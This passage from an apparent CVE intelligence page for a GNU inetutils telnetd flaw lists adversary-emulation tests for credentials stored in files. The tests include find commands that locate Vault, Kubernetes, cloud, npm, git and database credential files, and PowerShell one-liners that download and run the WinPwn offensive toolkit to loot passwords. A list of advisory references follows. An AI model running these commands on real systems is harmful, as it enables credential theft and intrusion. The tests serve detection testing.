Find HashiCorp Vault token files (~/.vault-token), which contain plaintext Vault tokens that grant access to secrets stored in Vault.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find Kubernetes cluster configuration files Linux Shell Privileged
Find Kubernetes configuration files requiring root privileges, including the root user kubeconfig (~/.kube/config) and cluster-level configuration files in /etc/kubernetes/. These files contain API server addresses, client certificates, and bearer tokens that grant access to...
Command (Shell)
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
T1552.001 Find Kubernetes user configuration files Linux, macOS Shell
Find Kubernetes user configuration files (~/.kube/config), which contain API server addresses, client certificates, and bearer tokens that grant access to the Kubernetes cluster. Defaults to using / as the search path.
Command (Shell)
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find Terraform credential files Linux, macOS Shell
Find Terraform credential files which may contain sensitive values such as API keys, passwords, and infrastructure secrets. Searches for both terraform.tfvars and terraform.tfstate.
Command (Shell)
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
T1552.001 Find and Access Github Credentials Linux, macOS Shell
Find .netrc files, which store GitHub credentials in clear text, and dump their contents if found.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find database credential files Linux, macOS Shell
Find user-level database credential files. Examples include ~/.pgpass, ~/.my.cnf, and ~/.mongorc.js.
Command (Shell)
for filename in #{filenames}; do
  find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
T1552.001 Find npm registry credential files Linux, macOS Shell
Find .npmrc files, which may contain plaintext npm registry authentication tokens.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 Find system database configuration files Linux Shell Privileged
Find system-level database configuration files (/etc/mysql/my.cnf, /etc/redis/redis.conf) which may contain credentials. Requires root privileges.
Command (Shell)
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 Search for Git Credential Files Linux, macOS Shell
Searches the specified directory for a git credential file, which may contain plaintext credentials, access tokens, or credential helper configurations. Example files include .git-credentials and .gitconfig.
Command (Shell)
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (15)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-24061
openwall.com
GitHub CVE
https://www.openwall.com/lists/oss-security/2026/01/20/2
openwall.com
GitHub CVE
https://www.openwall.com/lists/oss-security/2026/01/20/8
gnu.org
GitHub CVE
https://www.gnu.org/software/inetutils/
lists.gnu.org
GitHub CVE
https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html
codeberg.org
GitHub CVE
https://codeberg.org/inetutils/inetutils/commit/fd702c02497b2f398e739e3119bed0b23dd7aa7b
codeberg.org
GitHub CVE
https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc
vicarius.io
GitHub CVE
https://www.vicarius.io/vsociety/posts/cve-2026-24061-detection-script-remote-authentication-bypass-in-gnu-inetutils-package
vicarius.io
GitHub CVE
https://www.vicarius.io/vsociety/posts/cve-2026-24061-mitigation-script-remote-authentication-bypass-in-gnu-inetutils-package
openwall.com
NVD API Mailing List
http://www.openwall.com/lists/oss-security/2026/01/22/1
lists.debian.org
NVD API Mailing List Third Party Advisory
https://lists.debian.org/debian-lts-announce/2026/01/msg00025.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24061
labs.greynoise.io
NVD API Exploit Third Party Advisory
https://www.labs.greynoise.io/grimoire/2026-01-22-f-around-and-find-out-18-hours-of-unsolicited-houseguests/index.html
openwall.com
NVD API Mailing List Third Party Advisory
https://www.openwall.com/lists/oss-security/2026/01/20/2#:~:[email protected]%3A~%20USER='
redteam.ae
GitHub CVE
https://redteam.ae/blog/cve-2026-24061-inetutils-telnetd-root-bypass